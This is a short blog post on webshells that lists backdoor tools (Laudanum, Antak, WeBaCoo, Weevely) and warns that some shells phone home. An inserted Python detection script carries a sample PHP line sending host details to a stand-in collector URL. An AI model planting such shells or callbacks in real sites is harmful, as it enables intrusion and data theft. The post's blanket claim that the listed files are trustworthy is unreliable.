WebShells

Posted on June 20, 2018 - August 20, 2018 by nxnjz

Basics

If you don’t understand what a shell is, click here.

A webshell is usually a web page that gives the user control of the underlying operating system, usually via a command line.

Many webshells also provide a graphical interface for ease of use.

You should only use a webshell when more conventional access, like SSH or the almost obsolete Telnet, is not available.

Some may work better than others, and some may not work at all, depending on the security measures employed by the target.

Watch out for webshells that are backdoored. While webshells are usually considered backdoors themselves, many of them will “phone home”, letting someone (whoever put the backdoor in place, usually the developer) know that they have been executed. That person may then use the backdoor themselves for nefarious purposes. So make sure you look at the code before using a webshell, or look at the HTTP traffic generated when the file is executed. The latter will not necessarily reveal the existence of the backdoor in your shell. The files listed below are from reputable sources only, so you may trust them.
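One way to start the code review suggested above, as an added example (not from the original post or from any of the listed projects): a small Python audit that flags PHP calls able to send data off the host and URLs hidden inside base64 string literals. The function list, the names and the sample input are assumptions constructed for illustration, and every finding is a lead for manual review rather than proof of a backdoor.

```python
import base64
import re

# PHP calls that can send data off the host (assumed, non-exhaustive list).
# file_get_contents also reads local files, so every hit is a lead to review.
NETWORK_CALLS = re.compile(
    r"\b(curl_exec|curl_init|fsockopen|pfsockopen|stream_socket_client|"
    r"file_get_contents|mail)\s*\(", re.I)
URL = re.compile(r"\b(?:https?|ftp)://[^\s'\"<>)]+", re.I)
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def hidden_urls(line):
    """Decode quoted base64 literals and return any URLs found inside them."""
    found = []
    for blob in B64_LITERAL.findall(line):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # not valid base64 (binascii.Error is a ValueError)
            continue
        found += URL.findall(text)
    return found


def audit(source):
    """Return (line_no, kind, detail) findings to review before a file is used."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in NETWORK_CALLS.finditer(line):
            findings.append((no, "network-call", m.group(1)))
        for url in URL.findall(line):
            findings.append((no, "url", url))
        for url in hidden_urls(line):
            findings.append((no, "encoded-url", url))
    return findings

# Constructed sample: only the kind of lines the audit looks for, not a real webshell.
_ENC = base64.b64encode(b"http://collector.example.invalid/ping").decode()
SAMPLE = "\n".join([
    "<?php",
    "$u = base64_decode('%s');" % _ENC,
    "@file_get_contents($u . '?h=' . $_SERVER['HTTP_HOST']);",
    "mail('owner@example.invalid', 'installed', $_SERVER['SCRIPT_NAME']);",
    "echo 'ok';",
])

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("line %d: %-12s %s" % finding)
```

A clean result does not clear a file: callbacks can be built from concatenated strings or other encodings, which is why reading the code remains the primary check.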

 

WebShells

 

    • Laudanum on GitHub: A collection of webshells in different languages.
    • Antak PowerShell ASPX: Simple and works very well.
    • WeBaCoo: Perl script for generating PHP backdoors; it also lets you connect to a backdoor from your terminal for terminal-like access.
    • Weevely: Powerful Python script for generating backdoors, connecting to them, and running different modules to help with many tasks.

 

 
